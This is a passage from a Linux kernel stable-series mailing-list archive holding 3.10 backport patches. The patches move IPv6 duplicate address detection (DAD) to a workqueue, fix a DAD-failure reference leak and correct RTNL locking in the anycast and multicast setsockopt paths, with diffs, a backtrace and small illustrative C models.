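	assert(state != NULL);

	if (*state == STATE_PREDAD) {
		/* queued by addrconf_dad_start(): begin DAD now */
		*state = STATE_DAD;
		return DAD_BEGIN;
	}
	if (*state == STATE_ERRDAD) {
		/* queued by addrconf_dad_failure(): stop DAD */
		*state = STATE_POSTDAD;
		return DAD_ABORT;
	}
	/* otherwise: a regular probe/timeout round */
	return DAD_PROCESS;
}
```

The point of the two extra states is that the timer-context callers only
flip the state and queue the work; the parts that need rtnl run later in
process context.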

Relevant backtrace:
[  541.030090] RTNL: assertion failed at net/core/dev.c (4496)
[  541.031143] CPU: 0 PID: 0 Comm: swapper/0 Tainted: G           O 3.10.33-1-amd64-vyatta #1
[  541.031145] Hardware name: Bochs Bochs, BIOS Bochs 01/01/2007
[  541.031146]  ffffffff8148a9f0 000000000000002f ffffffff813c98c1 ffff88007c4451f8
[  541.031148]  0000000000000000 0000000000000000 ffffffff813d3540 ffff88007fc03d18
[  541.031150]  0000880000000006 ffff88007c445000 ffffffffa0194160 0000000000000000
[  541.031152] Call Trace:
[  541.031153]  <IRQ>  [<ffffffff8148a9f0>] ? dump_stack+0xd/0x17
[  541.031180]  [<ffffffff813c98c1>] ? __dev_set_promiscuity+0x101/0x180
[  541.031183]  [<ffffffff813d3540>] ? __hw_addr_create_ex+0x60/0xc0
[  541.031185]  [<ffffffff813cfe1a>] ? __dev_set_rx_mode+0xaa/0xc0
[  541.031189]  [<ffffffff813d3a81>] ? __dev_mc_add+0x61/0x90
[  541.031198]  [<ffffffffa01dcf9c>] ? igmp6_group_added+0xfc/0x1a0 [ipv6]
[  541.031208]  [<ffffffff8111237b>] ? kmem_cache_alloc+0xcb/0xd0
[  541.031212]  [<ffffffffa01ddcd7>] ? ipv6_dev_mc_inc+0x267/0x300 [ipv6]
[  541.031216]  [<ffffffffa01c2fae>] ? addrconf_join_solict+0x2e/0x40 [ipv6]
[  541.031219]  [<ffffffffa01ba2e9>] ? ipv6_dev_ac_inc+0x159/0x1f0 [ipv6]
[  541.031223]  [<ffffffffa01c0772>] ? addrconf_join_anycast+0x92/0xa0 [ipv6]
[  541.031226]  [<ffffffffa01c311e>] ? __ipv6_ifa_notify+0x11e/0x1e0 [ipv6]
[  541.031229]  [<ffffffffa01c3213>] ? ipv6_ifa_notify+0x33/0x50 [ipv6]
[  541.031233]  [<ffffffffa01c36c8>] ? addrconf_dad_completed+0x28/0x100 [ipv6]
[  541.031241]  [<ffffffff81075c1d>] ? task_cputime+0x2d/0x50
[  541.031244]  [<ffffffffa01c38d6>] ? addrconf_dad_timer+0x136/0x150 [ipv6]
[  541.031247]  [<ffffffffa01c37a0>] ? addrconf_dad_completed+0x100/0x100 [ipv6]
[  541.031255]  [<ffffffff8105313a>] ? call_timer_fn.isra.22+0x2a/0x90
[  541.031258]  [<ffffffffa01c37a0>] ? addrconf_dad_completed+0x100/0x100 [ipv6]

Hunks and backtrace stolen from a patch by Stephen Hemminger.

Reported-by: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Stephen Hemminger <stephen@networkplumber.org>
Signed-off-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
[Mike Manning <mmanning@brocade.com>: resolved minor conflicts in addrconf.c]
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 include/net/if_inet6.h |   4 +-
 net/ipv6/addrconf.c    | 186 ++++++++++++++++++++++++++++++++++++-------------
 2 files changed, 141 insertions(+), 49 deletions(-)

diff --git a/include/net/if_inet6.h b/include/net/if_inet6.h
index 3b558c6..a49b650 100644
--- a/include/net/if_inet6.h
+++ b/include/net/if_inet6.h
@@ -31,8 +31,10 @@
 #define IF_PREFIX_AUTOCONF	0x02
 
 enum {
+	INET6_IFADDR_STATE_PREDAD,
 	INET6_IFADDR_STATE_DAD,
 	INET6_IFADDR_STATE_POSTDAD,
+	INET6_IFADDR_STATE_ERRDAD,
 	INET6_IFADDR_STATE_UP,
 	INET6_IFADDR_STATE_DEAD,
 };
@@ -58,7 +60,7 @@ struct inet6_ifaddr {
 	unsigned long		cstamp;	/* created timestamp */
 	unsigned long		tstamp; /* updated timestamp */
 
-	struct timer_list	dad_timer;
+	struct delayed_work	dad_work;
 
 	struct inet6_dev	*idev;
 	struct rt6_info		*rt;
diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 4ff6a9c..98dd353 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -139,10 +139,12 @@ static int ipv6_count_addresses(struct inet6_dev *idev);
 static struct hlist_head inet6_addr_lst[IN6_ADDR_HSIZE];
 static DEFINE_SPINLOCK(addrconf_hash_lock);
 
-static void addrconf_verify(unsigned long);
+static void addrconf_verify(void);
+static void addrconf_verify_rtnl(void);
+static void addrconf_verify_work(struct work_struct *);
 
-static DEFINE_TIMER(addr_chk_timer, addrconf_verify, 0, 0);
-static DEFINE_SPINLOCK(addrconf_verify_lock);
+static struct workqueue_struct *addrconf_wq;
+static DECLARE_DELAYED_WORK(addr_chk_work, addrconf_verify_work);
 
 static void addrconf_join_anycast(struct inet6_ifaddr *ifp);
 static void addrconf_leave_anycast(struct inet6_ifaddr *ifp);
@@ -157,7 +159,7 @@ static struct rt6_info *addrconf_get_prefix_route(const struct in6_addr *pfx,
 						  u32 flags, u32 noflags);
 
 static void addrconf_dad_start(struct inet6_ifaddr *ifp);
-static void addrconf_dad_timer(unsigned long data);
+static void addrconf_dad_work(struct work_struct *w);
 static void addrconf_dad_completed(struct inet6_ifaddr *ifp);
 static void addrconf_dad_run(struct inet6_dev *idev);
 static void addrconf_rs_timer(unsigned long data);
@@ -259,9 +261,9 @@ static void addrconf_del_rs_timer(struct inet6_dev *idev)
 		__in6_dev_put(idev);
 }
 
-static void addrconf_del_dad_timer(struct inet6_ifaddr *ifp)
+static void addrconf_del_dad_work(struct inet6_ifaddr *ifp)
 {
-	if (del_timer(&ifp->dad_timer))
+	if (cancel_delayed_work(&ifp->dad_work))
 		__in6_ifa_put(ifp);
 }
 
@@ -273,12 +275,12 @@ static void addrconf_mod_rs_timer(struct inet6_dev *idev,
 	mod_timer(&idev->rs_timer, jiffies + when);
 }
 
-static void addrconf_mod_dad_timer(struct inet6_ifaddr *ifp,
-				   unsigned long when)
+static void addrconf_mod_dad_work(struct inet6_ifaddr *ifp,
+				   unsigned long delay)
 {
-	if (!timer_pending(&ifp->dad_timer))
+	if (!delayed_work_pending(&ifp->dad_work))
 		in6_ifa_hold(ifp);
-	mod_timer(&ifp->dad_timer, jiffies + when);
+	mod_delayed_work(addrconf_wq, &ifp->dad_work, delay);
 }
 
 static int snmp6_alloc_dev(struct inet6_dev *idev)
@@ -773,8 +775,9 @@ void inet6_ifa_finish_destroy(struct inet6_ifaddr *ifp)
 
 	in6_dev_put(ifp->idev);
 
-	if (del_timer(&ifp->dad_timer))
-		pr_notice("Timer is still running, when freeing ifa=%p\n", ifp);
+	if (cancel_delayed_work(&ifp->dad_work))
+		pr_notice("delayed DAD work was pending while freeing ifa=%p\n",
+			  ifp);
 
 	if (ifp->state != INET6_IFADDR_STATE_DEAD) {
 		pr_warn("Freeing alive inet6 address %p\n", ifp);
@@ -866,8 +869,7 @@ ipv6_add_addr(struct inet6_dev *idev, const struct in6_addr *addr, int pfxlen,
 
 	spin_lock_init(&ifa->lock);
 	spin_lock_init(&ifa->state_lock);
-	setup_timer(&ifa->dad_timer, addrconf_dad_timer,
-		    (unsigned long)ifa);
+	INIT_DELAYED_WORK(&ifa->dad_work, addrconf_dad_work);
 	INIT_HLIST_NODE(&ifa->addr_lst);
 	ifa->scope = scope;
 	ifa->prefix_len = pfxlen;
@@ -927,6 +929,8 @@ static void ipv6_del_addr(struct inet6_ifaddr *ifp)
 	int deleted = 0, onlink = 0;
 	unsigned long expires = jiffies;
 
+	ASSERT_RTNL();
+
 	spin_lock_bh(&ifp->state_lock);
 	state = ifp->state;
 	ifp->state = INET6_IFADDR_STATE_DEAD;
@@ -991,7 +995,7 @@ static void ipv6_del_addr(struct inet6_ifaddr *ifp)
 	}
 	write_unlock_bh(&idev->lock);
 
-	addrconf_del_dad_timer(ifp);
+	addrconf_del_dad_work(ifp);
 
 	ipv6_ifa_notify(RTM_DELADDR, ifp);
 
@@ -1614,7 +1618,7 @@ static void addrconf_dad_stop(struct inet6_ifaddr *ifp, int dad_failed)
 {
 	if (ifp->flags&IFA_F_PERMANENT) {
 		spin_lock_bh(&ifp->lock);
-		addrconf_del_dad_timer(ifp);
+		addrconf_del_dad_work(ifp);
 		ifp->flags |= IFA_F_TENTATIVE;
 		if (dad_failed)
 			ifp->flags |= IFA_F_DADFAILED;
@@ -1637,20 +1641,21 @@ static void addrconf_dad_stop(struct inet6_ifaddr *ifp, int dad_failed)
 		}
 		ipv6_del_addr(ifp);
 #endif
-	} else
+	} else {
 		ipv6_del_addr(ifp);
+	}
 }
 
 static int addrconf_dad_end(struct inet6_ifaddr *ifp)
 {
 	int err = -ENOENT;
 
-	spin_lock(&ifp->state_lock);
+	spin_lock_bh(&ifp->state_lock);
 	if (ifp->state == INET6_IFADDR_STATE_DAD) {
 		ifp->state = INET6_IFADDR_STATE_POSTDAD;
 		err = 0;
 	}
-	spin_unlock(&ifp->state_lock);
+	spin_unlock_bh(&ifp->state_lock);
 
 	return err;
 }
@@ -1683,7 +1688,12 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp)
 		}
 	}
 
-	addrconf_dad_stop(ifp, 1);
+	spin_lock_bh(&ifp->state_lock);
+	/* transition from _POSTDAD to _ERRDAD */
+	ifp->state = INET6_IFADDR_STATE_ERRDAD;
+	spin_unlock_bh(&ifp->state_lock);
+
+	addrconf_mod_dad_work(ifp, 0);
 }
 
 /* Join to solicited addr multicast group. */
@@ -1692,6 +1702,8 @@ void addrconf_join_solict(struct net_device *dev, const struct in6_addr *addr)
 {
 	struct in6_addr maddr;
 
+	ASSERT_RTNL();
+
 	if (dev->flags&(IFF_LOOPBACK|IFF_NOARP))
 		return;
 
@@ -1703,6 +1715,8 @@ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr)
 {
 	struct in6_addr maddr;
 
+	ASSERT_RTNL();
+
 	if (idev->dev->flags&(IFF_LOOPBACK|IFF_NOARP))
 		return;
 
@@ -1713,6 +1727,9 @@ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr)
 static void addrconf_join_anycast(struct inet6_ifaddr *ifp)
 {
 	struct in6_addr addr;
+
+	ASSERT_RTNL();
+
 	if (ifp->prefix_len == 127) /* RFC 6164 */
 		return;
 	ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len);
@@ -1724,6 +1741,9 @@ static void addrconf_join_anycast(struct inet6_ifaddr *ifp)
 static void addrconf_leave_anycast(struct inet6_ifaddr *ifp)
 {
 	struct in6_addr addr;
+
+	ASSERT_RTNL();
+
 	if (ifp->prefix_len == 127) /* RFC 6164 */
 		return;
 	ipv6_addr_prefix(&addr, &ifp->addr, ifp->prefix_len);
@@ -2358,7 +2378,7 @@ ok:
 			}
 #endif
 			in6_ifa_put(ifp);
-			addrconf_verify(0);
+			addrconf_verify();
 		}
 	}
 	inet6_prefix_notify(RTM_NEWPREFIX, in6_dev, pinfo);
@@ -2501,7 +2521,7 @@ static int inet6_addr_add(struct net *net, int ifindex, const struct in6_addr *p
 		 */
 		addrconf_dad_start(ifp);
 		in6_ifa_put(ifp);
-		addrconf_verify(0);
+		addrconf_verify_rtnl();
 		return 0;
 	}
 
@@ -3082,7 +3102,7 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 		hlist_for_each_entry_rcu(ifa, h, addr_lst) {
 			if (ifa->idev == idev) {
 				hlist_del_init_rcu(&ifa->addr_lst);
-				addrconf_del_dad_timer(ifa);
+				addrconf_del_dad_work(ifa);
 				goto restart;
 			}
 		}
@@ -3122,7 +3142,7 @@ static int addrconf_ifdown(struct net_device *dev, int how)
 	while (!list_empty(&idev->addr_list)) {
 		ifa = list_first_entry(&idev->addr_list,
 				       struct inet6_ifaddr, if_list);
-		addrconf_del_dad_timer(ifa);
+		addrconf_del_dad_work(ifa);
 
 		list_del(&ifa->if_list);
 
@@ -3217,10 +3237,10 @@ static void addrconf_dad_kick(struct inet6_ifaddr *ifp)
 		rand_num = net_random() % (idev->cnf.rtr_solicit_delay ? : 1);
 
 	ifp->dad_probes = idev->cnf.dad_transmits;
-	addrconf_mod_dad_timer(ifp, rand_num);
+	addrconf_mod_dad_work(ifp, rand_num);
 }
 
-static void addrconf_dad_start(struct inet6_ifaddr *ifp)
+static void addrconf_dad_begin(struct inet6_ifaddr *ifp)
 {
 	struct inet6_dev *idev = ifp->idev;
 	struct net_device *dev = idev->dev;
@@ -3272,25 +3292,68 @@ out:
 	read_unlock_bh(&idev->lock);
 }
 
-static void addrconf_dad_timer(unsigned long data)
+static void addrconf_dad_start(struct inet6_ifaddr *ifp)
+{
+	bool begin_dad = false;
+
+	spin_lock_bh(&ifp->state_lock);
+	if (ifp->state != INET6_IFADDR_STATE_DEAD) {
+		ifp->state = INET6_IFADDR_STATE_PREDAD;
+		begin_dad = true;
+	}
+	spin_unlock_bh(&ifp->state_lock);
+
+	if (begin_dad)
+		addrconf_mod_dad_work(ifp, 0);
+}
+
+static void addrconf_dad_work(struct work_struct *w)
 {
-	struct inet6_ifaddr *ifp = (struct inet6_ifaddr *) data;
+	struct inet6_ifaddr *ifp = container_of(to_delayed_work(w),
+						struct inet6_ifaddr,
+						dad_work);
 	struct inet6_dev *idev = ifp->idev;
 	struct in6_addr mcaddr;
 
+	enum {
+		DAD_PROCESS,
+		DAD_BEGIN,
+		DAD_ABORT,
+	} action = DAD_PROCESS;
+
+	rtnl_lock();
+
+	spin_lock_bh(&ifp->state_lock);
+	if (ifp->state == INET6_IFADDR_STATE_PREDAD) {
+		action = DAD_BEGIN;
+		ifp->state = INET6_IFADDR_STATE_DAD;
+	} else if (ifp->state == INET6_IFADDR_STATE_ERRDAD) {
+		action = DAD_ABORT;
+		ifp->state = INET6_IFADDR_STATE_POSTDAD;
+	}
+	spin_unlock_bh(&ifp->state_lock);
+
+	if (action == DAD_BEGIN) {
+		addrconf_dad_begin(ifp);
+		goto out;
+	} else if (action == DAD_ABORT) {
+		addrconf_dad_stop(ifp, 1);
+		goto out;
+	}
+
 	if (!ifp->dad_probes && addrconf_dad_end(ifp))
 		goto out;
 
-	write_lock(&idev->lock);
+	write_lock_bh(&idev->lock);
 	if (idev->dead || !(idev->if_flags & IF_READY)) {
-		write_unlock(&idev->lock);
+		write_unlock_bh(&idev->lock);
 		goto out;
 	}
 
 	spin_lock(&ifp->lock);
 	if (ifp->state == INET6_IFADDR_STATE_DEAD) {
 		spin_unlock(&ifp->lock);
-		write_unlock(&idev->lock);
+		write_unlock_bh(&idev->lock);
 		goto out;
 	}
 
@@ -3301,7 +3364,7 @@ static void addrconf_dad_timer(unsigned long data)
 
 		ifp->flags &= ~(IFA_F_TENTATIVE|IFA_F_OPTIMISTIC|IFA_F_DADFAILED);
 		spin_unlock(&ifp->lock);
-		write_unlock(&idev->lock);
+		write_unlock_bh(&idev->lock);
 
 		addrconf_dad_completed(ifp);
 
@@ -3309,15 +3372,16 @@ static void addrconf_dad_timer(unsigned long data)
 	}
 
 	ifp->dad_probes--;
-	addrconf_mod_dad_timer(ifp, ifp->idev->nd_parms->retrans_time);
+	addrconf_mod_dad_work(ifp, ifp->idev->nd_parms->retrans_time);
 	spin_unlock(&ifp->lock);
-	write_unlock(&idev->lock);
+	write_unlock_bh(&idev->lock);
 
 	/* send a neighbour solicitation for our addr */
 	addrconf_addr_solict_mult(&ifp->addr, &mcaddr);
 	ndisc_send_ns(ifp->idev->dev, NULL, &ifp->addr, &mcaddr, &in6addr_any);
 out:
 	in6_ifa_put(ifp);
+	rtnl_unlock();
 }
 
 static void addrconf_dad_completed(struct inet6_ifaddr *ifp)
@@ -3325,7 +3389,7 @@ static void addrconf_dad_completed(struct inet6_ifaddr *ifp)
 	struct net_device *dev = ifp->idev->dev;
 	struct in6_addr lladdr;
 
-	addrconf_del_dad_timer(ifp);
+	addrconf_del_dad_work(ifp);
 
 	/*
 	 *	Configure the address for reception. Now it is valid.
@@ -3557,23 +3621,23 @@ int ipv6_chk_home_addr(struct net *net, const struct in6_addr *addr)
  *	Periodic address status verification
  */
 
-static void addrconf_verify(unsigned long foo)
+static void addrconf_verify_rtnl(void)
 {
 	unsigned long now, next, next_sec, next_sched;
 	struct inet6_ifaddr *ifp;
 	int i;
 
+	ASSERT_RTNL();
+
 	rcu_read_lock_bh();
-	spin_lock(&addrconf_verify_lock);
 	now = jiffies;
 	next = round_jiffies_up(now + ADDR_CHECK_FREQUENCY);
 
-	del_timer(&addr_chk_timer);
+	cancel_delayed_work(&addr_chk_work);
 
 	for (i = 0; i < IN6_ADDR_HSIZE; i++) {
 restart:
-		hlist_for_each_entry_rcu_bh(ifp,
-					 &inet6_addr_lst[i], addr_lst) {
+		hlist_for_each_entry_rcu_bh(ifp, &inet6_addr_lst[i], addr_lst) {
 			unsigned long age;
 
 			if (ifp->flags & IFA_F_PERMANENT)
@@ -3664,13 +3728,22 @@ restart:
 
 	ADBG((KERN_DEBUG "now = %lu, schedule = %lu, rounded schedule = %lu => %lu\n",
 	      now, next, next_sec, next_sched));
-
-	addr_chk_timer.expires = next_sched;
-	add_timer(&addr_chk_timer);
-	spin_unlock(&addrconf_verify_lock);
+	mod_delayed_work(addrconf_wq, &addr_chk_work, next_sched - now);
 	rcu_read_unlock_bh();
 }
 
+static void addrconf_verify_work(struct work_struct *w)
+{
+	rtnl_lock();
+	addrconf_verify_rtnl();
+	rtnl_unlock();
+}
+
+static void addrconf_verify(void)
+{
+	mod_delayed_work(addrconf_wq, &addr_chk_work, 0);
+}
+
 static struct in6_addr *extract_addr(struct nlattr *addr, struct nlattr *local)
 {
 	struct in6_addr *pfx = NULL;
@@ -3722,6 +3795,8 @@ static int inet6_addr_modify(struct inet6_ifaddr *ifp, u8 ifa_flags,
 	clock_t expires;
 	unsigned long timeout;
 
+	ASSERT_RTNL();
+
 	if (!valid_lft || (prefered_lft > valid_lft))
 		return -EINVAL;
 
@@ -3755,7 +3830,7 @@ static int inet6_addr_modify(struct inet6_ifaddr *ifp, u8 ifa_flags,
 
 	addrconf_prefix_route(&ifp->addr, ifp->prefix_len, ifp->idev->dev,
 			      expires, flags);
-	addrconf_verify(0);
+	addrconf_verify_rtnl();
 
 	return 0;
 }
@@ -4364,6 +4439,8 @@ static int inet6_set_iftoken(struct inet6_dev *idev, struct in6_addr *token)
 	bool update_rs = false;
 	struct in6_addr ll_addr;
 
+	ASSERT_RTNL();
+
 	if (token == NULL)
 		return -EINVAL;
 	if (ipv6_addr_any(token))
@@ -4409,6 +4486,7 @@ static int inet6_set_iftoken(struct inet6_dev *idev, struct in6_addr *token)
 	}
 
 	write_unlock_bh(&idev->lock);
+	addrconf_verify_rtnl();
 	return 0;
 }
 
@@ -4610,6 +4688,9 @@ static void __ipv6_ifa_notify(int event, struct inet6_ifaddr *ifp)
 {
 	struct net *net = dev_net(ifp->idev->dev);
 
+	if (event)
+		ASSERT_RTNL();
+
 	inet6_ifa_notify(event ? : RTM_NEWADDR, ifp);
 
 	switch (event) {
@@ -5138,6 +5219,12 @@ int __init addrconf_init(void)
 	if (err < 0)
 		goto out_addrlabel;
 
+	addrconf_wq = create_workqueue("ipv6_addrconf");
+	if (!addrconf_wq) {
+		err = -ENOMEM;
+		goto out_nowq;
+	}
+
 	/* The addrconf netdev notifier requires that loopback_dev
 	 * has it's ipv6 private information allocated and setup
 	 * before it can bring up and give link-local addresses
@@ -5168,7 +5255,7 @@ int __init addrconf_init(void)
 
 	register_netdevice_notifier(&ipv6_dev_notf);
 
-	addrconf_verify(0);
+	addrconf_verify();
 
 	err = rtnl_af_register(&inet6_ops);
 	if (err < 0)
@@ -5199,6 +5286,8 @@ errout:
 errout_af:
 	unregister_netdevice_notifier(&ipv6_dev_notf);
 errlo:
+	destroy_workqueue(addrconf_wq);
+out_nowq:
 	unregister_pernet_subsys(&addrconf_ops);
 out_addrlabel:
 	ipv6_addr_label_cleanup();
@@ -5234,7 +5323,8 @@ void addrconf_cleanup(void)
 	for (i = 0; i < IN6_ADDR_HSIZE; i++)
 		WARN_ON(!hlist_empty(&inet6_addr_lst[i]));
 	spin_unlock_bh(&addrconf_hash_lock);
-
-	del_timer(&addr_chk_timer);
+	cancel_delayed_work(&addr_chk_work);
 	rtnl_unlock();
+
+	destroy_workqueue(addrconf_wq);
 }
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 222/319] ipv6: addrconf: fix dev refcont leak when DAD failed
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (120 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 221/319] ipv6: move DAD and addrconf_verify processing to workqueue Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 223/319] ipv6: fix rtnl locking in setsockopt for anycast and multicast Willy Tarreau
                   ` (96 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Wei Yongjun, David S . Miller, Mike Manning, Willy Tarreau

From: Wei Yongjun <weiyongjun1@huawei.com>

commit 751eb6b6042a596b0080967c1a529a9fe98dac1d upstream.

In general, when DAD detects a duplicate IPv6 address, ifp->state
is set to INET6_IFADDR_STATE_ERRDAD and DAD is stopped by a
delayed work. The call tree looks like this:

ndisc_recv_ns
  -> addrconf_dad_failure        <- missing ifp put
     -> addrconf_mod_dad_work
       -> schedule addrconf_dad_work()
         -> addrconf_dad_stop()  <- missing ifp hold before call it

addrconf_dad_failure() is called with an ifp reference held, but does
not put it. addrconf_dad_work() calls addrconf_dad_stop() without
holding an extra reference. Normally this does not cause any issue.

But a race between addrconf_dad_failure() and addrconf_dad_work()
may leak an ifp reference, so the netdevice cannot be unregistered.
dmesg shows the following messages:

IPv6: eth0: IPv6 duplicate address fe80::XX:XXXX:XXXX:XX detected!
...
unregister_netdevice: waiting for eth0 to become free. Usage count = 1
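
As a rough illustration of the hold/put pairing this patch adds, the
following userspace sketch only counts references. It does not reproduce
the race itself. All names are hypothetical stand-ins, and it assumes
that addrconf_dad_stop() ends up dropping exactly one reference.

```c
#include <assert.h>

/* Hypothetical stand-in for struct inet6_ifaddr. */
struct ifa_model {
	int refcnt;       /* models the ifp reference count */
	int work_pending; /* models delayed_work_pending() */
};

static void ifa_hold(struct ifa_model *ifa)
{
	ifa->refcnt++;
}

static void ifa_put(struct ifa_model *ifa)
{
	assert(ifa->refcnt > 0);
	ifa->refcnt--;
}

/* Models addrconf_mod_dad_work(): the work item gets its own
 * reference unless it is already queued. */
static void model_mod_dad_work(struct ifa_model *ifa)
{
	if (!ifa->work_pending)
		ifa_hold(ifa);
	ifa->work_pending = 1;
}

/* Models addrconf_dad_stop(), assumed to drop one reference. */
static void model_dad_stop(struct ifa_model *ifa)
{
	ifa_put(ifa);
}

/* Models addrconf_dad_failure() after the fix: the caller's
 * reference is released here. */
static void model_dad_failure(struct ifa_model *ifa)
{
	model_mod_dad_work(ifa);
	ifa_put(ifa);            /* added by this patch */
}

/* Models the DAD_ABORT branch of addrconf_dad_work() after the fix. */
static void model_dad_work_abort(struct ifa_model *ifa)
{
	ifa->work_pending = 0;
	ifa_hold(ifa);           /* added by this patch */
	model_dad_stop(ifa);     /* consumes the reference just taken */
	ifa_put(ifa);            /* "out:" drops the work item's reference */
}
```

In this model each function releases exactly what it was handed, so the
count returns to its starting value whether or not the work was already
pending when the failure was reported.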

Cc: stable@vger.kernel.org
Fixes: c15b1ccadb32 ("ipv6: move DAD and addrconf_verify processing to workqueue")
Signed-off-by: Wei Yongjun <weiyongjun1@huawei.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/addrconf.c | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 98dd353..0f18d858 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -1694,6 +1694,7 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp)
 	spin_unlock_bh(&ifp->state_lock);
 
 	addrconf_mod_dad_work(ifp, 0);
+	in6_ifa_put(ifp);
 }
 
 /* Join to solicited addr multicast group. */
@@ -3337,6 +3338,7 @@ static void addrconf_dad_work(struct work_struct *w)
 		addrconf_dad_begin(ifp);
 		goto out;
 	} else if (action == DAD_ABORT) {
+		in6_ifa_hold(ifp);
 		addrconf_dad_stop(ifp, 1);
 		goto out;
 	}
-- 
2.8.0.rc2.1.gbe9624a


* [PATCH 3.10 223/319] ipv6: fix rtnl locking in setsockopt for anycast and multicast
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (121 preceding siblings ...)
  2017-02-05 19:20 ` [PATCH 3.10 222/319] ipv6: addrconf: fix dev refcont leak when DAD failed Willy Tarreau
@ 2017-02-05 19:20 ` Willy Tarreau
  2017-02-05 19:20 ` [PATCH 3.10 224/319] ip6_gre: fix flowi6_proto value in ip6gre_xmit_other() Willy Tarreau
                   ` (95 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:20 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Sabrina Dubroca, Cong Wang, David S . Miller, Mike Manning,
	Willy Tarreau

From: Sabrina Dubroca <sd@queasysnail.net>

commit a9ed4a2986e13011fcf4ed2d1a1647c53112f55b upstream.

Calling setsockopt with IPV6_JOIN_ANYCAST or IPV6_LEAVE_ANYCAST
triggers the assertion in addrconf_join_solict()/addrconf_leave_solict().

ipv6_sock_ac_join(), ipv6_sock_ac_drop(), ipv6_sock_ac_close() need to
take RTNL before calling ipv6_dev_ac_inc/dec. Same thing with
ipv6_sock_mc_join(), ipv6_sock_mc_drop(), ipv6_sock_mc_close() before
calling ipv6_dev_mc_inc/dec.

This patch moves ASSERT_RTNL() up a level in the call stack.
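
The resulting pattern can be sketched in userspace as follows: the
socket-option entry point takes the lock, and the device-level helper
only asserts that it is held. This is a model under simplifying
assumptions. A plain flag stands in for the RTNL mutex, and the model_*
names are hypothetical.

```c
#include <assert.h>

/* Hypothetical stand-in for "RTNL is held"; the kernel uses a mutex. */
static int rtnl_held;

static void model_rtnl_lock(void)
{
	assert(!rtnl_held);
	rtnl_held = 1;
}

static void model_rtnl_unlock(void)
{
	assert(rtnl_held);
	rtnl_held = 0;
}

/* Models ipv6_dev_ac_inc(): after this patch the assertion sits in
 * the device-level helper, so every caller is checked. */
static int model_dev_ac_inc(void)
{
	assert(rtnl_held);       /* plays the role of ASSERT_RTNL() */
	return 0;
}

/* Models ipv6_sock_ac_join(): the setsockopt path takes the lock
 * around the device-level call. */
static int model_sock_ac_join(void)
{
	int err;

	model_rtnl_lock();
	err = model_dev_ac_inc();
	model_rtnl_unlock();
	return err;
}
```

Calling model_dev_ac_inc() directly, without the lock, trips the
assertion in this model, which is the userspace analogue of the
"RTNL: assertion failed" message.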

Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reported-by: Tommi Rantala <tt.rantala@gmail.com>
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Cc: <stable@vger.kernel.org> 
[Mike Manning <mmanning@brocade.com>: resolved minor conflicts in addrconf.c]
Signed-off-by: Mike Manning <mmanning@brocade.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv6/addrconf.c | 15 +++++----------
 net/ipv6/anycast.c  | 12 ++++++++++++
 net/ipv6/mcast.c    | 14 ++++++++++++++
 3 files changed, 31 insertions(+), 10 deletions(-)

diff --git a/net/ipv6/addrconf.c b/net/ipv6/addrconf.c
index 0f18d858..3bfd8a5 100644
--- a/net/ipv6/addrconf.c
+++ b/net/ipv6/addrconf.c
@@ -1697,14 +1697,12 @@ void addrconf_dad_failure(struct inet6_ifaddr *ifp)
 	in6_ifa_put(ifp);
 }
 
-/* Join to solicited addr multicast group. */
-
+/* Join to solicited addr multicast group.
+ * caller must hold RTNL */
 void addrconf_join_solict(struct net_device *dev, const struct in6_addr *addr)
 {
 	struct in6_addr maddr;
 
-	ASSERT_RTNL();
-
 	if (dev->flags&(IFF_LOOPBACK|IFF_NOARP))
 		return;
 
@@ -1712,12 +1710,11 @@ void addrconf_join_solict(struct net_device *dev, const struct in6_addr *addr)
 	ipv6_dev_mc_inc(dev, &maddr);
 }
 
+/* caller must hold RTNL */
 void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr)
 {
 	struct in6_addr maddr;
 
-	ASSERT_RTNL();
-
 	if (idev->dev->flags&(IFF_LOOPBACK|IFF_NOARP))
 		return;
 
@@ -1725,12 +1722,11 @@ void addrconf_leave_solict(struct inet6_dev *idev, const struct in6_addr *addr)
 	__ipv6_dev_mc_dec(idev, &maddr);
 }
 
+/* caller must hold RTNL */
 static void addrconf_join_anycast(struct inet6_ifaddr *ifp)
 {
 	struct in6_addr addr;
 
-	ASSERT_RTNL();
-
 	if (ifp->prefix_len == 127) /* RFC 6164 */
 		return;
